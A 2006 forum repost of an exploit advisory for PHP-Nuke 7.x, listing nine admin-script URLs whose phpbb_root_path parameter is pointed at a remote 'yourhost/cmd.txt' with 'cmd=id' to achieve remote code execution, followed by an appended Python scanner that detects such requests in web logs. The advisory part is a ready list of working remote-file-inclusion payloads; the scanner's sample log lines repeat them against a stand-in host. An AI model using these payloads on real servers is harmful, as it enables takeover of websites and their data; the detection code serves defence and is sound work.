PHP-Nuke <= 7.9 Final (phpbb_root_path) Remote File Inclusions
« : September 07, 2006, 06:45:38 PM »
--------------------------------------------------------------------------------
# PHP-NUKE Remote File Inclusion[PHP-NUKE]
# Contact : [email protected] http://blogcu.com/KeyCoder
# Risk : High
# Class : Remote
# Version : PHP-NUKE 7.7
--------------------------------------------
Site:php-nuke.org
--------------------------------------------
Example Vulnerable:
modules/Forums/admin/admin_styles.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_forums.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_forumauth.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_avatar.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_users.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
modules/Forums/admin/admin_words.php?phpbb_root_path=http://yourhost/cmd.txt?&cmd=id
------------------------------------------------
By KeyCoder
Greetz:<SecretlyX-BeLa> all Turkish Hackers
# bb-pcsecurity.de - always be up to date
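
Added example, not part of the original post: a check that flags web server log entries carrying the phpbb_root_path parameter from the URLs listed above, separating remote (scheme-style) values from other overrides. The combined log format, the sample entries and the names classify/scan are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter named in the advisory; assumed never to appear in legitimate requests.
PARAM = "phpbb_root_path"
# Scheme-style or network-path values: http://, ftp://, php://, data:, //host, \\host
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)", re.I)
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return (script_path, verdict) if the line sets PARAM, else None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
    values = [v for k, v in parse_qsl(parts.query, keep_blank_values=True)
              if k == PARAM]
    if not values:
        return None
    if any(REMOTE_VALUE.match(v) for v in values):
        return parts.path, "remote-include-attempt"
    return parts.path, "param-override"

def scan(lines):
    """Return (client_ip, script_path, verdict) for every flagged line."""
    hits = []
    for line in lines:
        result = classify(line)
        if result:
            hits.append((line.split()[0],) + result)
    return hits

# Constructed sample entries (documentation IP ranges, hypothetical host).
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Sep/2006:18:50:01 +0000] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://scanner.example/x.txt?&cmd=id HTTP/1.1" 200 512',
    '203.0.113.7 - - [07/Sep/2006:18:50:02 +0000] "GET /modules/Forums/admin/admin_words.php?phpbb_root_path=http%3A%2F%2Fscanner.example%2Fx.txt%3F HTTP/1.1" 200 512',
    '198.51.100.4 - - [07/Sep/2006:18:51:10 +0000] "GET /modules/Forums/admin/admin_users.php?phpbb_root_path=../../ HTTP/1.1" 200 90',
    '192.0.2.10 - - [07/Sep/2006:18:52:00 +0000] "GET /modules.php?name=Forums&file=viewtopic&t=12 HTTP/1.1" 200 7331',
]

if __name__ == "__main__":
    for ip, path, verdict in scan(SAMPLE_LOG):
        print(f"{verdict:24} {ip:15} {path}")
```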